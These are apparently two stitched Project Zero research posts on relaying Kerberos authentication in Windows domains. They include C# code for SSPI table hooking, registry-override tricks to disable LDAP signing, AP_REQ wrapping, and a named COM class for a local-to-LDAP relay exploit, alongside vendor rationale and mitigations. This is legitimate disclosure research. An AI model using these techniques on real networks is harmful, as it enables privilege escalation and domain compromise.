        ImpLevel.RPC_C_IMP_LEVEL_IMPERSONATE, IntPtr.Zero,

        EOLE_AUTHENTICATION_CAPABILITIES.EOAC_DYNAMIC_CLOAKING,

        IntPtr.Zero);

}

finally

{

    SetProcessModuleName(str);

}

In the above code, we register to only receive Kerberos authentication and we can also specify an arbitrary SPN as I described in the previous blog post. One thing to note is that the call to CoInitializeSecurity will establish the connection to RPCSS and pass the executable filename. Therefore we need to modify the filename before calling the API as we can't change it after the connection has been established.

For swag points I specify the filename System rather than build the full path to svchost.exe. This is the name assigned to the kernel which is also granted access through the firewall. We restore the original filename after the call to CoInitializeSecurity to reduce the risk of it breaking something unexpectedly.

That covers the selection of the authentication service to use, but doesn't help us actually capture that authentication. My first thought to capture the authentication was to find the socket handle for the TCP server, close it and create a new socket in its place. Then I could directly process the RPC protocol and parse out the authentication. This felt somewhat risky as the RPC runtime would still think it has a valid TCP server socket and might fail in unexpected ways. Also it felt like a lot of work, when I have a perfectly good RPC protocol parser built into Windows.

I then resigned myself to hooking the SSPI APIs, although ideally I'd prefer not to do so. However, once I started looking at the RPC runtime library there weren't any imports for the SSPI APIs to hook into and I really didn't want to patch the functions themselves. It turns out that the RPC runtime loads security packages dynamically, based on the authentication service requested and the configuration of the HKLM\SOFTWARE\Microsoft\Rpc\SecurityService registry key.

Screenshot of the Registry Editor showing HKLM\SOFTWARE\Microsoft\Rpc\SecurityService key

The key, shown in the above screenshot has a list of values. The value's name is the number assigned to the authentication service, for example 16 is RPC_C_AUTHN_GSS_KERBEROS. The value's data is then the name of the DLL to load which provides the API, for Kerberos this is sspicli.dll.

The RPC runtime then loads a table of security functions from the DLL by calling its exported InitSecurityInterface method. At least for sspicli the table is always the same and is a pre-initialized structure in the DLL's data section. This is perfect, we can just call InitSecurityInterface before the RPC runtime is initialized to get a pointer to the table then modify its function pointers to point to our own implementation of the API. As an added bonus the table is in a writable section of the DLL so we don't even need to modify the memory protection.

Of course implementing the hooks is non-trivial. This is made more complex because RPC uses the DCE style Kerberos authentication which requires two tokens from the client before the server considers the authentication complete. This requires maintaining more state to keep the RPC server and client implementations happy. I'll leave this as an exercise for the reader.

Choosing a Relay Target Service

The next step is to choose a suitable target service to relay the authentication to. For issue 325 I relayed the authentication to the same machine's DCOM activator RPC service and was able to achieve an arbitrary file write.

I thought that maybe I could do so again, so I modified my .NET RPC client to handle the relayed authentication and tried accessing local RPC services. No matter what RPC server or function I called, I always got an access denied error. Even if I wrote my own RPC server which didn't have any checks, it would fail.

Digging into the failure it turned out that at some point (I don't know specifically when), Microsoft added a mitigation into the RPC runtime to make it very difficult to relay authentication back to the same system.

void SSECURITY_CONTEXT::ValidateUpgradeCriteria() {

  if (this->AuthnLevel < RPC_C_AUTHN_LEVEL_PKT_INTEGRITY) {

    if (IsLoopback())

      this->UnsafeLoopbackAuth = TRUE;

  }

}

The SSECURITY_CONTEXT::ValidateUpgradeCriteria method is called when receiving RPC authentication packets. If the authentication level for the RPC connection is less than RPC_C_AUTHN_LEVEL_PKT_INTEGRITY such as RPC_C_AUTHN_LEVEL_PKT_CONNECT and the authentication was from the same system then a flag is set to true in the security context. The IsLoopback function calls the QueryContextAttributes API for the undocumented SECPKG_ATTR_IS_LOOPBACK attribute value from the server security context. This attribute indicates if the authentication was from the local system.

When an RPC call is made the server will check if the flag is true, if it is then the call will be immediately rejected before any code is called in the server including the RPC interface's security callback. The only way to pass this check is either the authentication doesn't come from the local system or the authentication level is RPC_C_AUTHN_LEVEL_PKT_INTEGRITY or above which then requires the client to know the session key for signing or encryption. The RPC client will also check for local authentication and will increase the authentication level if necessary. This is an effective way of preventing the relay of local authentication to elevate privileges.

Instead as I was focussing on Kerberos, I came to the conclusion that relaying the authentication to an enterprise network service was more useful. As the default settings for a domain controller's LDAP service still do not enforce signing, it would seem a reasonable target. As we'll see, this provides a limitation of the source of the authentication, as it must not enable Integrity otherwise the LDAP server will enforce signing.

The problem with LDAP is I didn't have any code which implemented the protocol. I'm sure there is some .NET code to do it somewhere, but the fewer dependencies I have the better. As I mentioned in the previous blog post, Windows has a builtin LDAP library in wldap32.dll. Could I repurpose its API but convert it into using relayed authentication?

Unsurprisingly the library doesn't have a "Enable relayed authentication" mode, but after a few minutes in a disassembler, it was clear it was also delay-loading the SSPI interfaces through the InitSecurityInterface method. I could repurpose my code for capturing the authentication for relaying the authentication. There was initially a minor issue, accidentally or on purpose there was a stray call to QueryContextAttributes which was directly imported, so I needed to patch that through an Import Address Table (IAT) hook as distasteful as that was.

There was still a problem however. When the client connects it always tries to enable LDAP signing, as we are relaying authentication with no access to the session key this causes the connection to fail. Setting the option value LDAP_OPT_SIGN in the library to false didn't change this behavior. I needed to set the LdapClientIntegrity registry value to 0 in the LDAP service's key before initializing the library. Unfortunately that key is only modifiable by administrators. I could have modified the library itself, but as it was checking the key during DllMain it would be a complex dance to patch the DLL in the middle of loading.

Instead I decided to override the HKEY_LOCAL_MACHINE key. This is possible for the Win32 APIs by using the RegOverridePredefKey API. The purpose of the API is to allow installers to redirect administrator-only modifications to the registry into a writable location, however for our purposes we can also use it to redirect the reading of the LdapClientIntegrity registry value.

[DllImport("Advapi32.dll")]

static extern int RegOverridePredefKey(

    IntPtr hKey,

    IntPtr hNewHKey

);

[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]

static extern IntPtr LoadLibrary(string libname);

static readonly IntPtr HKEY_LOCAL_MACHINE = new IntPtr(-2147483646);

static void OverrideLocalMachine(RegistryKey key)

{

    int res = RegOverridePredefKey(HKEY_LOCAL_MACHINE,

        key?.Handle.DangerousGetHandle() ?? IntPtr.Zero);

    if (res != 0)

        throw new Win32Exception(res);

}

static void LoadLDAPLibrary()

{

    string dummy = @"SOFTWARE\DUMMY";

    string target = @"System\CurrentControlSet\Services\LDAP";

    using (var key = Registry.CurrentUser.CreateSubKey(dummy, true))

    {

        using (var okey = key.CreateSubKey(target, true))

        {

            okey.SetValue("LdapClientIntegrity", 0,

                          RegistryValueKind.DWord);

            OverrideLocalMachine(key);

            try

            {

                IntPtr lib = LoadLibrary("wldap32.dll");

                if (lib == IntPtr.Zero)

                    throw new Win32Exception();

            }

            finally

            {

                OverrideLocalMachine(null);

                Registry.CurrentUser.DeleteSubKeyTree(dummy);

            }

        }

    }

}

This code redirects the HKEY_LOCAL_MACHINE key and then loads the LDAP library. Once it's loaded we can then revert the override so that everything else works as expected. We can now repurpose the built-in LDAP library to relay Kerberos authentication to the domain controller. For the final step, we need a privileged COM service to unmarshal the OBJREF to start the process.

Choosing a COM Unmarshaller

The RemotePotato attack assumes that a more privileged user is authenticated on the same machine. However I wanted to see what I could do without that requirement. Realistically the only thing that can be done is to relay the computer's domain account to the LDAP server.

To get access to authentication for the computer account, we need to unmarshal the OBJREF inside a process running as either SYSTEM or NETWORK SERVICE. These local accounts are mapped to the computer account when authenticating to another machine on the network.

We do have one big limitation on the selection of a suitable COM server: it must make the RPC connection using the RPC_C_AUTHN_LEVEL_PKT_CONNECT authentication level. Anything above that will enable Integrity on the authentication which will prevent us relaying to LDAP. Fortunately RPC_C_AUTHN_LEVEL_PKT_CONNECT is the default setting for DCOM, but unfortunately all services which use the svchost process change that default to RPC_C_AUTHN_LEVEL_PKT which enables Integrity.

After a bit of hunting around with OleViewDotNet, I found a good candidate class, CRemoteAppLifetimeManager (CLSID: 0bae55fc-479f-45c2-972e-e951be72c0c1) which is hosted in its own executable, runs as NETWORK SERVICE, and doesn't change any default settings as shown below.

Screenshot of the OleViewDotNet showing the security flags of the CRemoteAppLifetimeManager COM server

The server doesn't change the default impersonation level from RPC_C_IMP_LEVEL_IDENTIFY, which means the negotiated token will only be at SecurityIdentification level. For LDAP, this doesn't matter as it only uses the token for access checking, not to open resources. However, this would prevent using the same authentication to access something like the SMB server. I'm confident that given enough effort, a COM server with both RPC_C_AUTHN_LEVEL_PKT_CONNECT and RPC_C_IMP_LEVEL_IMPERSONATE could be found, but it wasn't necessary for my exploit.

Wrapping Up

That's a somewhat complex exploit. However, it does allow for authentication relay, with arbitrary Kerberos tokens from a local user to LDAP on a default Windows 10 system. Hopefully it might provide some ideas of how to implement something similar without always needing to write your protocol servers and clients and just use what's already available.

This exploit is very similar to the existing RemotePotato exploit that Microsoft have already stated will not be fixed. This is because Microsoft considers authentication relay attacks to be an issue with the configuration of the Windows network, such as not enforcing signing on LDAP, rather than the particular technique used to generate the authentication relay. As I mentioned in the previous blog post, at most this would be assessed as a Moderate severity issue which does not reach the bar for fixing as part of regular updates (or potentially, not being fixed at all).

As for mitigating this issue without it being fixed by Microsoft, a system administrator should follow Microsoft's recommendations to enable signing and/or encryption on any sensitive service in the domain, especially LDAP. They can also enable Extended Protection for Authentication where the service is protected by TLS. They can also configure the default DCOM authentication level to be RPC_C_AUTHN_LEVEL_PKT_INTEGRITY or above. These changes would make the relay of Kerberos, or NTLM significantly less useful.

Using Kerberos for Authentication Relay Attacks

By: Ryan
20 October 2021 at 16:26

Posted by James Forshaw, Project Zero

This blog post is a summary of some research I've been doing into relaying Kerberos authentication in Windows domain environments. To keep this blog shorter I am going to assume you have a working knowledge of Windows network authentication, and specifically Kerberos and NTLM. For a quick primer on Kerberos see this page which is part of Microsoft's Kerberos extension documentation or you can always read RFC4120.

Background

Windows based enterprise networks rely on network authentication protocols, such as NT Lan Manager (NTLM) and Kerberos to implement single sign on. These protocols allow domain users to seamlessly connect to corporate resources without having to repeatedly enter their passwords. This works by the computer's Local Security Authority (LSA) process storing the user's credentials when the user first authenticates. The LSA can then reuse those credentials for network authentication without requiring user interaction.

However, the convenience of not prompting the user for their credentials when performing network authentication has a downside. To be most useful, common clients for network protocols such as HTTP or SMB must automatically perform the authentication without user interaction otherwise it defeats the purpose of avoiding asking the user for their credentials.

This automatic authentication can be a problem if an attacker can trick a user into connecting to a server they control. The attacker could induce the user's network client to start an authentication process and use that information to authenticate to an unrelated service allowing the attacker to access that service's resources as the user. When the authentication protocol is captured and forwarded to another system in this way it's referred to as an Authentication Relay attack.

Simple diagram of an authentication relay attack

Authentication relay attacks using the NTLM protocol were first published all the way back in 2001 by Josh Buchbinder (Sir Dystic) of the Cult of the Dead Cow. However, even in 2021 NTLM relay attacks still represent a threat in default configurations of Windows domain networks. The most recent major abuse of NTLM relay was through the Active Directory Certificate Services web enrollment service. This combined with the PetitPotam technique to induce a Domain Controller to perform NTLM authentication allows for a Windows domain to be compromised by an unauthenticated attacker.

Over the years Microsoft has made many efforts to mitigate authentication relay attacks. The best mitigations rely on the fact that the attacker does not have knowledge of the user's password or control over the authentication process. This includes signing and encryption (sealing) of network traffic using a session key which is protected by the user's password or channel binding as part of Extended Protection for Authentication (EPA) which prevents relay of authentication to a network protocol under TLS.

Another mitigation regularly proposed is to disable NTLM authentication either for particular services or network wide using Group Policy. While this has potential compatibility issues, restricting authentication to only Kerberos should be more secure. That got me thinking, is disabling NTLM sufficient to eliminate authentication relay attacks on Windows domains?

Why are there no Kerberos Relay Attacks?

The obvious question is, if NTLM is disabled could you relay Kerberos authentication instead? Searching for Kerberos Relay attacks doesn't yield much public research that I could find. There is the krbrelayx tool written by Dirk-jan which is similar in concept to the ntlmrelayx tool in impacket, a common tool for performing NTLM authentication relay attacks. However as the accompanying blog post makes clear this is a tool to abuse unconstrained delegation rather than relay the authentication.

I did find a recent presentation by Sagi Sheinfeld, Eyal Karni, Yaron Zinar from Crowdstrike at Defcon 29 (and also coming up at Blackhat EU 2021) which relayed Kerberos authentication. The presentation discussed MitM network traffic to specific servers, then relaying the Kerberos authentication. A MitM attack relies on being able to spoof an existing server through some mechanism, which is a well known risk.  The last line in the presentation is "Microsoft Recommendation: Avoid being MITM’d…" which seems a reasonable approach to take if possible.

However a MitM attack is slightly different to the common NTLM relay attack scenario where you can induce a domain joined system to authenticate to a server an attacker controls and then forward that authentication to an unrelated service. NTLM is easy to relay as it wasn't designed to distinguish authentication to a particular service from any other. The only unique aspect was the server (and later client) challenge but that value wasn't specific to the service and so authentication for say SMB could be forwarded to HTTP and the victim service couldn't tell the difference. Subsequently EPA has been retrofitted onto NTLM to make the authentication specific to a service, but due to backwards compatibility these mitigations aren't always used.

On the other hand Kerberos has always required the target of the authentication to be specified beforehand through a principal name, typically this is a Service Principal Name (SPN) although in certain circumstances it can be a User Principal Name (UPN). The SPN is usually represented as a string of the form CLASS/INSTANCE:PORT/NAME, where CLASS is the class of service, such as HTTP or CIFS, INSTANCE is typically the DNS name of the server hosting the service and PORT and NAME are optional.

The SPN is used by the Kerberos Ticket Granting Server (TGS) to select the shared encryption key for a Kerberos service ticket generated for the authentication. This ticket contains the details of the authenticating user based on the contents of the Ticket Granting Ticket (TGT) that was requested during the user's initial Kerberos authentication process. The client can then package the service's ticket into an Authentication Protocol Request (AP_REQ) authentication token to send to the server.

Without knowledge of the shared encryption key the Kerberos service ticket can't be decrypted by the service and the authentication fails. Therefore if Kerberos authentication is attempted to an SMB service with the SPN CIFS/fileserver.domain.com, then that ticket shouldn't be usable if the relay target is a HTTP service with the SPN HTTP/fileserver.domain.com, as the shared key should be different.

In practice that's rarely the case in Windows domain networks. The Domain Controller associates the SPN with a user account, most commonly the computer account of the domain joined server and the key is derived from the account's password. The CIFS/fileserver.domain.com and HTTP/fileserver.domain.com SPNs would likely be assigned to the FILESERVER$ computer account, therefore the shared encryption key will be the same for both SPNs and in theory the authentication could be relayed from one service to the other. The receiving service could query for the authenticated SPN string from the authentication APIs and then compare it to its expected value, but this check is typically optional.

The selection of the SPN to use for the Kerberos authentication is typically defined by the target server's host name. In a relay attack the attacker's server will not be the same as the target. For example, the SMB connection might be targeting the attacker's server, and will assign the SPN CIFS/evil.com. Assuming this SPN is even registered it would in all probability have a different shared encryption key to the CIFS/fileserver.domain.com SPN due to the different computer accounts. Therefore relaying the authentication to the target SMB service will fail as the ticket can't be decrypted.

The requirement that the SPN is associated with the target service's shared encryption key is why I assume few consider Kerberos relay attacks to be a major risk, if not impossible. There's an assumption that an attacker cannot induce a client into generating a service ticket for an SPN which differs from the host the client is connecting to.

However, there's nothing inherently stopping Kerberos authentication being relayed if the attacker can control the SPN. The only way to stop relayed Kerberos authentication is for the service to protect itself through the use of signing/sealing or channel binding which rely on the shared knowledge between the client and server, but crucially not the attacker relaying the authentication. However, even now these service protections aren't the default even on critical protocols such as LDAP.

As the only limit on basic Kerberos relay (in the absence of service protections) is the selection of the SPN, this research focuses on how common protocols select the SPN and whether it can be influenced by the attacker to achieve Kerberos authentication relay.

Kerberos Relay Requirements

It's easy to demonstrate in a controlled environment that Kerberos relay is possible. We can write a simple client which uses the Security Support Provider Interface (SSPI) APIs to communicate with the LSA and implement the network authentication. This client calls the InitializeSecurityContext API which will generate an AP_REQ authentication token containing a Kerberos Service Ticket for an arbitrary SPN. This AP_REQ can be forwarded to an intermediate server and then relayed to the service the SPN represents. You'll find this will work, again to reiterate, assuming that no service protections are in place.

However, there are some caveats in the way a client calls InitializeSecurityContext which will impact how useful the generated AP_REQ is even if the attacker can influence the SPN. If the client specifies any one of the following request flags, ISC_REQ_CONFIDENTIALITY, ISC_REQ_INTEGRITY, ISC_REQ_REPLAY_DETECT or ISC_REQ_SEQUENCE_DETECT then the generated AP_REQ will enable encryption and/or integrity checking. When the AP_REQ is received by the server using the AcceptSecurityContext API it will return a set of flags which indicate if the client enabled encryption or integrity checking. Some services use these returned flags to opportunistically enable service protections.

For example LDAP's default setting is to enable signing/encryption if the client supports it. Therefore you shouldn't be able to relay Kerberos authentication to LDAP if the client enabled any of these protections. However, other services such as HTTP don't typically support signing and sealing and so will happily accept authentication tokens which specify the request flags.

Another caveat is the client could specify channel binding information, typically derived from the certificate used by the TLS channel used in the communication. The channel binding information can be controlled by the attacker, but not set to arbitrary values without a bug in the TLS implementation or the code which determines the channel binding information itself.

While services have an option to only enable channel binding if it's supported by the client, all Windows Kerberos AP_REQ tokens indicate support through the KERB_AP_OPTIONS_CBT options flag in the authenticator. Sagi Sheinfeld et al did demonstrate (see slide 22 in their presentation) that if you can get the AP_REQ from a non-Windows source it will not set the options flag and so no channel binding is enforced, but that was apparently not something Microsoft will fix. It is also possible that a Windows client disables channel binding through a registry configuration option, although that seems to be unlikely in real world networks.

If the client specifies the ISC_REQ_MUTUAL_AUTH request flag when generating the initial AP_REQ it will enable mutual authentication between the client and server. The client expects to receive an Authentication Protocol Response (AP_REP) token from the server after sending the AP_REQ to prove it has possession of the shared encryption key. If the server doesn't return a valid AP_REP the client can assume it's a spoofed server and refuse to continue the communication.

From a relay perspective, mutual authentication doesn't really matter as the server is the target of the relay attack, not the client. The target server will assume the authentication has completed once it's accepted the AP_REQ, so that's all the attacker needs to forward. While the server will generate the AP_REP and return it to the attacker they can just drop it unless they need the relayed client to continue to participate in the communication for some reason.

One final consideration is that the SSPI APIs have two security packages which can be used to implement Kerberos authentication, Negotiate and Kerberos. The Negotiate protocol wraps the AP_REQ (and other authentication tokens) in the SPNEGO protocol whereas Kerberos sends the authentication tokens using a simple GSS-API wrapper (see RFC4121).

The first potential issue is Negotiate is by far the most likely package in use as it allows a network protocol the flexibility to use the most appropriate authentication protocol that the client and server both support. However, what happens if the client uses the raw Kerberos package but the server uses Negotiate?

This isn't a problem as the server implementation of Negotiate will pass the input token to the function NegpDetermineTokenPackage in lsasrv.dll during the first call to AcceptSecurityContext. This function detects if the client has passed a GSS-API Kerberos token (or NTLM) and enables a pass through mode where Negotiate gets out of the way. Therefore even if the client uses the Kerberos package you can still authenticate to the server and keep the client happy without having to extract the inner authentication token or wrap up response tokens.

One actual issue for relaying is the Negotiate protocol enables integrity protection (equivalent to passing ISC_REQ_INTEGRITY to the underlying package) so that it can generate a Message Integrity Code (MIC) for the authentication exchange to prevent tampering. Using the Kerberos package directly won't add integrity protection automatically. Therefore relaying Kerberos AP_REQs from Negotiate will likely hit issues related to automatic enabling of signing on the server. It is possible for a client to explicitly disable automatic integrity checking by passing the ISC_REQ_NO_INTEGRITY request attribute, but that's not a common case.

It's possible to disable Negotiate from the relay if the client passes an arbitrary authentication token to the first call of the InitializeSecurityContext API. On the first call the Negotiate implementation will call the NegpDetermineTokenPackage function to determine whether to enable authentication pass through. If the initial token is NTLM or looks like a Kerberos token then it'll pass through directly to the underlying security package and it won't set ISC_REQ_INTEGRITY, unless the client explicitly requested it. The byte sequence [0x00, 0x01, 0x40] is sufficient to get Negotiate to detect Kerberos, and the token is then discarded so it doesn't have to contain any further valid data.

Sniffing and Proxying Traffic

Before going into individual protocols that I've researched, it's worth discussing some more obvious ways of getting access to Kerberos authentication targeted at other services. First is sniffing network traffic sent from client to the server. For example, if the Kerberos AP_REQ is sent to a service over an unencrypted network protocol and the attacker can view that traffic the AP_REQ could be extracted and relayed. The selection of the SPN will be based on the expected traffic so the attacker doesn't need to do anything to influence it.

The Kerberos authentication protocol has protections against this attack vector. The Kerberos AP_REQ doesn't just contain the service ticket, it's also accompanied by an Authenticator which is encrypted using the ticket's session key. This key is accessible by both the legitimate client and the service. The authenticator contains a timestamp of when it was generated, and the service can check if this authenticator is within an allowable time range and whether it has seen the timestamp already. This allows the service to reject replayed authenticators by caching recently received values, and the allowable time window prevents the attacker waiting for any cache to expire before replaying.

What this means is that while an attacker could sniff the Kerberos authentication on the wire and relay it, if the service has already received the authenticator it would be rejected as being a replay. The only way to exploit it would be to somehow prevent the legitimate authentication request from reaching the service, or race the request so that the attacker's packet is processed first.

Note, RFC4120 mentions the possibility of embedding the client's network address in the authenticator so that the service could reject authentication coming from the wrong host. This isn't used by the Windows Kerberos implementation as far as I can tell. No doubt it would cause too many false positives for the replay protection in anything but the simplest enterprise networks.

Therefore the only reliable way to exploit this scenario would be to actively interpose on the network communications between the client and service. This is of course practical and has been demonstrated many times assuming the traffic isn't protected using something like TLS with server verification. Various attacks would be possible such as ARP or DNS spoofing attacks or HTTP proxy redirection to perform the interposition of the traffic.

However, active MitM of protocols is a known risk and therefore an enterprise might have technical defenses in place to mitigate the issue. Of course, if such enterprises have enabled all the recommended relay protections,it's a moot point. Regardless, we'll assume that MitM is impractical for existing services due to protections in place and consider how individual protocols handle SPN selection.

IPSec and AuthIP

My research into Kerberos authentication relay came about in part because I was looking into the implementation of IPSec on Windows as part of my firewall research. Specifically I was researching the AuthIP ISAKMP which allows for Windows authentication protocols to be used to establish IPsec Security Associations.

I noticed that the AuthIP protocol has a GSS-ID payload which can be sent from the server to the client. This payload contains the textual SPN to use for the Kerberos authentication during the AuthIP process. This SPN is passed verbatim to the SSPI InitializeSecurityContext call by the AuthIP client.

As no verification is done on the format of the SPN in the GSS-ID payload, it allows the attacker to fully control the values including the service class and instance name. Therefore if an attacker can induce a domain joined machine to connect to an attacker controlled service and negotiate AuthIP then a Kerberos AP_REQ for an arbitrary SPN can be captured for relay use. As this AP_REQ is never sent to the target of the SPN it will not be detected as a replay.

Inducing authentication isn't necessarily difficult. Any IP traffic which is covered by the domain configured security connection rules will attempt to perform AuthIP. For example it's possible that a UDP response for a DNS request from the domain controller might be sufficient. AuthIP supports two authenticated users, the machine and the calling user. By default it seems the machine authenticates first, so if you convinced a Domain Controller to authenticate you'd get the DC computer account which could be fairly exploitable.

For interest's sake, the SPN is also used to determine the computer account associated with the server. This computer account is then used with Service For User (S4U) to generate a local access token allowing the client to determine the identity of the server. However I don't think this is that useful as the fake server can't complete the authentication and the connection will be discarded.

The security connection rules use IP address ranges to determine what hosts need IPsec authentication. If these address ranges are too broad it's also possible that ISAKMP AuthIP traffic might leak to external networks. For example if the rules don't limit the network ranges to the enterprise's addresses, then even a connection out to a public service could be accompanied by the ISAKMP AuthIP packet. This can be then exploited by an attacker who is not co-located on the enterprise network just by getting a client to connect to their server, such as through a web URL.

Diagram of a relay using a fake AuthIP server

To summarize the attack process from the diagram:

  1. Induce a client computer to send some network traffic to EVILHOST. It doesn't really matter what the traffic is, only that the IP address, type and port must match an IP security connection rule to use AuthIP. EVILHOST does not need to be domain joined to perform the attack.
  2. The network traffic will get the Windows IPsec client to try and establish a security association with the target host.
  3. A fake AuthIP server on the target host receives the request to establish a security association and returns a GSS-ID payload. This payload contains the target SPN, for example CIFS/FILESERVER.
  4. The IPsec client uses the SPN to create an AP_REQ token and sends it to EVILHOST.
  5. EVILHOST relays the Kerberos AP_REQ to the target service on FILESERVER.

Relaying this AuthIP authentication isn't ideal from an attacker's perspective. As the authentication will be used to sign and seal the network traffic, the request context flags for the call to InitializeSecurityContext will require integrity and confidentiality protection. For network protocols such as LDAP which default to requiring signing and sealing if the client supports it, this would prevent the relay attack from working. However if the service ignores the protection and doesn't have any further checks in place this would be sufficient.

This issue was reported to MSRC and assigned case number 66900. However Microsoft have indicated that it will not be fixed with a security bulletin. I've described Microsoft's rationale for not fixing this issue later in the blog post. If you want to reproduce this issue there's details on Project Zero's issue tracker.

MSRPC

After discovering that AuthIP could allow for authentication relay the next protocol I looked at is MSRPC. The protocol supports NTLM, Kerberos or Negotiate authentication protocols over connected network transports such as named pipes or TCP. These authentication protocols need to be opted into by the server using the RpcServerRegisterAuthInfo API by specifying the authentication service constants of RPC_C_AUTHN_WINNT, RPC_C_AUTHN_GSS_KERBEROS or RPC_C_AUTHN_GSS_NEGOTIATE respectively. When registering the authentication information the server can optionally specify the SPN that needs to be used by the client.

However, this SPN isn't actually used by the RPC server itself. Instead it's registered with the runtime, and a client can query the server's SPN using the RpcMgmtInqServerPrincName management API. Once the SPN is queried the client can configure its authentication for the connection using the RpcBindingSetAuthInfo API. However, this isn't required; the client could just generate the SPN manually and set it. If the client doesn't call RpcBindingSetAuthInfo then it will not perform any authentication on the RPC connection.

Aside, curiously when a connection is made to the server it can query the client's authentication information using the RpcBindingInqAuthClient API. However, the SPN that this API returns is the one registered by RpcServerRegisterAuthInfo and NOT the one which was used by the client to authenticate. Also Microsoft does mention the call to RpcMgmtInqServerPrincName in the "Writing a secure RPC client or server" section on MSDN. However they frame it in the context of mutual authentication and not to protect against a relay attack.

If a client queries for the SPN from a malicious RPC server it will authenticate using a Kerberos AP_REQ for an SPN fully under the attacker's control. Whether the AP_REQ has integrity or confidentiality enabled depends on the authentication level set during the call to RpcBindingSetAuthInfo. If this is set to RPC_C_AUTHN_LEVEL_CONNECT and the client uses RPC_C_AUTHN_GSS_KERBEROS then the AP_REQ won't have integrity enabled. However, if Negotiate is used or anything above RPC_C_AUTHN_LEVEL_CONNECT as a level is used then it will have the integrity/confidentiality flags set.

Doing a quick scan in system32 the following DLLs call the RpcMgmtInqServerPrincName API: certcli.dll, dot3api.dll, dusmsvc.dll, FrameServerClient.dll, L2SecHC.dll, luiapi.dll, msdtcprx.dll, nlaapi.dll, ntfrsapi.dll, w32time.dll, WcnApi.dll, WcnEapAuthProxy.dll, WcnEapPeerProxy.dll, witnesswmiv2provider.dll, wlanapi.dll, wlanext.exe, WLanHC.dll, wlanmsm.dll, wlansvc.dll, wwansvc.dll, wwapi.dll. Some basic analysis shows that none of these clients check the value of the SPN and use it verbatim with RpcBindingSetAuthInfo. That said, they all seem to use RPC_C_AUTHN_GSS_NEGOTIATE and set the authentication level to RPC_C_AUTHN_LEVEL_PKT_PRIVACY which makes them less useful as an attack vector.

If the client specifies RPC_C_AUTHN_GSS_NEGOTIATE but does not specify an SPN then the runtime generates one automatically. This is based on the target hostname with the RestrictedKrbHost service class. The runtime doesn't process the hostname, it just concatenates strings and for some reason the runtime doesn't support generating the SPN for RPC_C_AUTHN_GSS_KERBEROS.

One additional quirk of the RPC runtime is that the request attribute flag ISC_REQ_USE_DCE_STYLE is used when calling InitializeSecurityContext. This enables a special three-leg authentication mode which results in the server sending back an AP_RET and then receiving another AP_RET from the client. Until that third AP_RET has been provided to the server it won't consider the authentication complete so it's not sufficient to just forward the initial AP_REQ token and close the connection to the client. This just makes the relay code slightly more complex but not impossible.

A second change that ISC_REQ_USE_DCE_STYLE introduces is that the Kerberos AP_REQ token does not have an GSS-API wrapper. This causes the call to NegpDetermineTokenPackage to fail to detect the package in use, making it impossible to directly forward the traffic to a server using the Negotiate package. However, this prefix is not protected against modification so the relay code can append the appropriate value before forwarding to the server. For example the following C# code can be used to convert a DCE style AP_REQ to a GSS-API format which Negotiate will accept.

public static byte[] EncodeLength(int length)

{

    if (length < 0x80)

        return new byte[] { (byte)length };

    if (length < 0x100)

        return new byte[] { 0x81, (byte)length };

    if (length < 0x10000)

        return new byte[] { 0x82, (byte)(length >> 8),

                            (byte)(length & 0xFF) };

    throw new ArgumentException("Invalid length", nameof(length));

}

public static byte[] ConvertApReq(byte[] token)

{

    if (token.Length == 0 || token[0] != 0x6E)

        return token;

    MemoryStream stm = new MemoryStream();

    BinaryWriter writer = new BinaryWriter(stm);

    Console.WriteLine("Converting DCE AP_REQ to GSS-API format.");

    byte[] header = new byte[] { 0x06, 0x09, 0x2a, 0x86, 0x48,

       0x86, 0xf7, 0x12, 0x01, 0x02, 0x02, 0x01, 0x00 };

    writer.Write((byte)0x60);

    writer.Write(EncodeLength(header.Length + token.Length));

    writer.Write(header);

    writer.Write(token);

    return stm.ToArray();

}

Subsequent tokens in the authentication process don't need to be wrapped; in fact, wrapping them with their GSS-API headers will cause the authentication to fail. Relaying MSRPC requests would probably be difficult just due to the relative lack of clients which request the server's SPN. Also when the SPN is requested it tends to be a conscious act of securing the client and so best practice tends to require the developer to set the maximum authentication level, making the Kerberos AP_REQ less useful.

DCOM

The DCOM protocol uses MSRPC under the hood to access remote COM objects, therefore it should have the same behavior as MSRPC. The big difference is DCOM is designed to automatically handle the authentication requirements of a remote COM object through binding information contained in the DUALSTRINGARRAY returned during Object Exporter ID (OXID) resolving. Therefore the client doesn't need to explicitly call RpcBindingSetAuthInfo to configure the authentication.

The binding information contains the protocol sequence and endpoint to use (such as TCP on port 30000) as well as the security bindings. Each security binding contains the RPC authentication service (wAuthnSvc in the below screenshot) to use as well as an optional SPN (aPrincName) for the authentication. Therefore a malicious DCOM server can force the client to use the RPC_C_AUTHN_GSS_KERBEROS authentication service with a completely arbitrary SPN by returning an appropriate security binding.

Screenshot of part of the MS-DCOM protocol documentation showing the SECURITYBINDING structure

The authentication level chosen by the client depends on the value of the dwAuthnLevel parameter specified if the COM client calls the CoInitializeSecurity API. If the client doesn't explicitly call CoInitializeSecurity then a default will be used which is currently RPC_C_AUTHN_LEVEL_CONNECT. This means neither integrity or confidentiality will be enforced on the Kerberos AP_REQ by default.

One limitation is that without a call to CoInitializeSecurity, the default impersonation level for the client is set to RPC_C_IMP_LEVEL_IDENTIFY. This means the access token generated by the DCOM RPC authentication can only be used for identification and not for impersonation. For some services this isn't an issue, for example LDAP doesn't need an impersonation level token. However for others such as SMB this would prevent access to files. It's possible that you could find a COM client which sets both RPC_C_AUTHN_LEVEL_CONNECT and RPC_C_IMP_LEVEL_IMPERSONATE though there's no trivial process to assess that.

Getting a client to connect to the server isn't trivial as DCOM isn't a widely used protocol on modern Windows networks due to high authentication requirements. However, one use case for this is local privilege escalation. For example you could get a privileged service to connect to the malicious COM server and relay the computer account Kerberos AP_REQ which is generated. I have a working PoC for this which allows a local non-admin user to connect to the domain's LDAP server using the local computer's credentials.

This attack is somewhat similar to the RemotePotato attack (which uses NTLM rather than Kerberos) which again Microsoft have refused to fix. I'll describe this in more detail in a separate blog post after this one.

HTTP

HTTP has supported NTLM and Negotiate authentication for a long time (see this draft from 2002 although the most recent RFC is 4559 from 2006). To initiate a Windows authentication session the server can respond to a request with the status code 401 and specify a WWW-Authenticate header with the value Negotiate. If the client supports Windows authentication it can use InitializeSecurityContext to generate a token, convert the binary token into a Base64 string and send it in the next request to the server with the Authorization header. This process is repeated until the client errors or the authentication succeeds.

